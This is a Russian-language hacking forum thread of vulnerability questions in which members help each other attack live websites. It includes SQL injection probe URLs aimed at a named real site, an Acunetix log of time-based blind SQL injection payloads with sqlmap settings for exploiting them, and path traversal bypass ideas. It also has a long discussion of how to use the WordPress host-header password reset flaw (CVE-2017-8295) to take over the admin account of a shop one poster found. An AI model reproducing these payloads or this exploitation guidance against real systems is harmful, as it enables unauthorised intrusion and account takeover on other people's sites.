Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    Скорее всего кеш... И явно на том ИП все держится
    Есть ответы как с ним бороться, чтобы внести измененния?

    Очень похоже, что инъекции нету. Просто там делит на слова и делает поиск по словам и частям слов
     
  2. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    смотрим:
    Code:
    baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10 and 1=(select 1 union select 1) -- g
    http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10%20and%201%20in%20(1,2,3)%20--%20g
    http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10%20and%201%20in%20(1,2,3)%20--%20g%20union%20select%201,2,3
    
    говорит о том что вафа там и нету. Ни селект ни запятая не режется.
     
    DezMond™ likes this.
  3. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    Сканирую сканером сайт. Сегодня акунетикс выдал такой лог
    Code:
    The vulnerability affects http://www.site.com/login.php , Client-IP
    
    Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script
    
    Attack details
    
    HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z
    
    Tests performed:
    
        0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943
        0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737
        0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765
        0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925
        0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727
        0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741
        0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756
        0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85
        0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718
    HTTP request
    
    GET /login.php HTTP/1.1
    Referer: https://www.google.com/search?hl=en&q=testing
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z
    
    Пишет Blind SQL. Как крутить такое?
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    797
    Reputations:
    841
    Логично как пишет, Blind SQL! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3
     
    _________________________
    Andrey979 likes this.
  5. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    Я не совсем понял как правильно скормить запрос мапу..
    sqlmap -u http://www.site.com/login.php --technique=B --level=5 --dbs так?
     
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Andrey979 likes this.
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Ты уже задавал данный вопрос. Вариантов не так много
    ./ .\ \\ // ? /[…]//
     
    ci0b2n1feec likes this.
  8. ci0b2n1feec

    ci0b2n1feec New Member

    Joined:
    4 Oct 2018
    Messages:
    49
    Likes Received:
    2
    Reputations:
    0
    пробовал нечего не помогло
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    797
    Reputations:
    841
    Изучить движок, исходники, возможно есть другие файлы, которые не доступны с вэба, но в них есть баги, проинклудить их...
     
    _________________________
    ms13, ci0b2n1feec and crlf like this.
  10. ci0b2n1feec

    ci0b2n1feec New Member

    Joined:
    4 Oct 2018
    Messages:
    49
    Likes Received:
    2
    Reputations:
    0
    Это тоже пробовали, нечего интересного) Интересует что то типо NULL байт, как было в старых версиях
     
  11. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    Еще хотел спросить. А в GET запросе можно мапу задать уязвимый параметр, чтобы он по нему шел? В POST можно, а с GET возможно? Акунетикс выдаёт этот параметр - Client-IP
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    797
    Reputations:
    841
    Там где угодно можно задать, тут с подобными вопросами вам уже в ветку
    Вопросы по SQLMap
     
    _________________________
  13. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    Кто знает, как реализовать этот експлойт https://www.exploit-db.com/exploits/41963/
    Нашел шоп с этой уязвимостью, немного разобрал, что можно сбросить пасс админа с помощью этого скрипта без авторизации. Перепробовав все варианты, ничего не выходит. Кто сталкивался?
     
  14. ci0b2n1feec

    ci0b2n1feec New Member

    Joined:
    4 Oct 2018
    Messages:
    49
    Likes Received:
    2
    Reputations:
    0
    Там много зависимостей для этого уязвимости, нужно что бы мыло админа было [email protected] только тогда ты сможешь отправить на свое мыло его код эсплойт ест на гитхабе загугль
    CVE:2017-8295 github на питоне будет
     
  15. fandor9

    fandor9 Active Member

    Joined:
    16 Nov 2018
    Messages:
    213
    Likes Received:
    217
    Reputations:
    8
    С чего вы решили что мыло админа должно быть [email protected]? Вот первоисточник. Что-бы сбросить пасс, вам нужно 3 вещи:
    1. Знать логин админа
    2. Вам надо создать ящик [email protected]ваш-домейн.нет
    3. Вам нужно, что-бы ящик самого админа был не доступен или же это мыло с кодом для сброса пароля было откинуто и вам на ящик под вашим контролем ([email protected]ваш-домейн.нет) пишла копия этого мыла.
    Тогда вы сможете с помощью ссылки в мыле скинуть пароль админа.
     
  16. ci0b2n1feec

    ci0b2n1feec New Member

    Joined:
    4 Oct 2018
    Messages:
    49
    Likes Received:
    2
    Reputations:
    0
    ну на заборе тоже сам знаешь что написано, попробуй и поймешь
     
  17. fandor9

    fandor9 Active Member

    Joined:
    16 Nov 2018
    Messages:
    213
    Likes Received:
    217
    Reputations:
    8
    Что на заборе написано, что мыло вордпресс админа должно "[email protected]" быть?
     
  18. ci0b2n1feec

    ci0b2n1feec New Member

    Joined:
    4 Oct 2018
    Messages:
    49
    Likes Received:
    2
    Reputations:
    0
    Ну ты проведи атаку и увидишь что успеха будет ноль!Уязвимость связана с подменой host сервера если у админа мыло [email protected] и твой майл сервер ebanko.ru а жертва vk.com, то у тебу получиться подменить только gmail.com на ebanko.ru а eblanfandor9 ты не как не заменишь.Если что то не пробывал и не пробивал не стоит сувать свой нос отталкиваясь от мануалов.
     
    #2798 ci0b2n1feec, 12 Feb 2020
    Last edited by a moderator: 12 Feb 2020
  19. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    547
    Likes Received:
    1,021
    Reputations:
    336
    Ребята, заканчивайте, есть public disclosure, там всё чётко написано. Этот спор, с выяснениями, кто еблан, а кто красавчик, и что на заборе написано, ни к чему хорошему не приведёт. Если хочется, кайфуйте в ЛС.

    Уязвимость, очень редкая, должна совпасть куча зависимостей, но если по простому:
    1. Настройка виртуального хоста веб-сервера Apache, должна допускать возможность Host Header Injection
    2. sendmail не должен доставить письмо по легитимному адресу (DoS, DDoS, DNS spoofing, etc). Либо мыло админа должно быть невалидным.
    3. HTTP_HOST атакующего должен уметь принимать почту (привет temp-mail.org)
    @ci0b2n1feec, есть большой опыт эксплуатации подобных уязвимостей? Комьюнити скажет только спасибо, если просветите и покажите как нужно и почему оно так.
     
    fandor9 and ms13 like this.
  20. fandor9

    fandor9 Active Member

    Joined:
    16 Nov 2018
    Messages:
    213
    Likes Received:
    217
    Reputations:
    8
    НЕ стоит хамить.
    я этого нигде и не писал. Прочтите внимательно что я написал.
    Если вы не понимаете атаку, то не это не значит что она не работает. Там несколько условий для успешного выполнения. Ещё раз на пальцах:
    1. Для сбросе пароля вам нужно знать мыло админа. Допустим оно [email protected]
    2. При отправке мыло на сброс пароля отправляется от адреса [email protected] на адрес [email protected]. В этой версии вордпресса при отправке POST-запроса заменяется в мыле отправителя домейн на то что вы передали в заголовке Host. Допустим там будет стоять Host: super-mail.ru. Тогда админу на почту [email protected] вышлется мыло от [email protected]super-mail.ru.
    3. Ну и теперь самое сложное, это мыло либо должно быть заблокировано майл-сервером админа и отброшено назад отправителю ([email protected]super-mail.ru) либо админ должен ответить с копией этого мыла отправителю (ещё менее вероятно). И только тогда получаем заветное мыло с кодом сброса пароля.
    Ясен пень что это очень редко где сработает.
     
    #2800 fandor9, 12 Feb 2020
    Last edited by a moderator: 12 Feb 2020
Loading...